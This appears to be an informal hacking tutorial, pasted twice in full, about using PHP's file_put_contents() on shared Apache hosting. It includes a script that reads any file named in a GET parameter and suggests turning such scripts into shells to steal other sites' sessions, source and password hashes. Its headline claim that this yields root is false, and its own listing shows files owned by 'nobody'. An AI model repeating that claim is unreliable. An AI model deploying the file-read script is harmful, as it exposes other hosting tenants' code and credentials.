Main:advertisement
Use the PHP file_put_contents() function to gain root.
This is no hacking technique or something but it could help you in some cases.
I suppose many of you know of the php function file_put_contents(). You can easily create a file with this. But what porbably most of you won't know is that you can also create php scripts with this function that run under the root account of your apache server.
Let's begin shall we.
We got the following script:
<?php
$filename = "evilscript.php";
$scriptcontent = "<?php
//script code goes here
?>";
file_put_contents($filename, $scriptcontent);
?>
This will create the following script:
<?php
//script code goes here
?>
Because the web server creates this script, it is owned by the web and when we examine the file better we'll see the following:
$ ls evilscript.php
-rw-r--r-- 1 nobody nobody xx Jan 1 00:00 evilscript.php
Apache usually runs as the user nobody for the record ;)
Because the script is owned by the web server it can edit eveything on it. The safe_mode directive in php does NOT offer protection for this behavior.
If this script has content to read e.g. the session data of another site stored on the server then you could read and modify everything! This is surely a risc in a shared hosting setup. You could also make a shell of the script and get root on the web server.
Another big risc is that you can easily get the source code of scripts stored on the server that aren't yours. Here's an example:
<?php
header('Content-Type: text/plain');
readfile($_GET['file']);
?>
If I would specify to be for example admin.php or something like that then I would simply get the source of that file. And if it contains e.g. passwordhashes or something... I don't need to draw a picture with it do I ;)
I hope you've learned something of this article and find it useful.
- The_Cell
I suppose many of you know of the php function file_put_contents(). You can easily create a file with this. But what porbably most of you won't know is that you can also create php scripts with this function that run under the root account of your apache server.
Let's begin shall we.
We got the following script:
<?php
$filename = "evilscript.php";
$scriptcontent = "<?php
//script code goes here
?>";
file_put_contents($filename, $scriptcontent);
?>
This will create the following script:
<?php
//script code goes here
?>
Because the web server creates this script, it is owned by the web and when we examine the file better we'll see the following:
$ ls evilscript.php
-rw-r--r-- 1 nobody nobody xx Jan 1 00:00 evilscript.php
Apache usually runs as the user nobody for the record ;)
Because the script is owned by the web server it can edit eveything on it. The safe_mode directive in php does NOT offer protection for this behavior.
If this script has content to read e.g. the session data of another site stored on the server then you could read and modify everything! This is surely a risc in a shared hosting setup. You could also make a shell of the script and get root on the web server.
Another big risc is that you can easily get the source code of scripts stored on the server that aren't yours. Here's an example:
<?php
header('Content-Type: text/plain');
readfile($_GET['file']);
?>
If I would specify to be for example admin.php or something like that then I would simply get the source of that file. And if it contains e.g. passwordhashes or something... I don't need to draw a picture with it do I ;)
I hope you've learned something of this article and find it useful.
- The_Cell
Posted by 
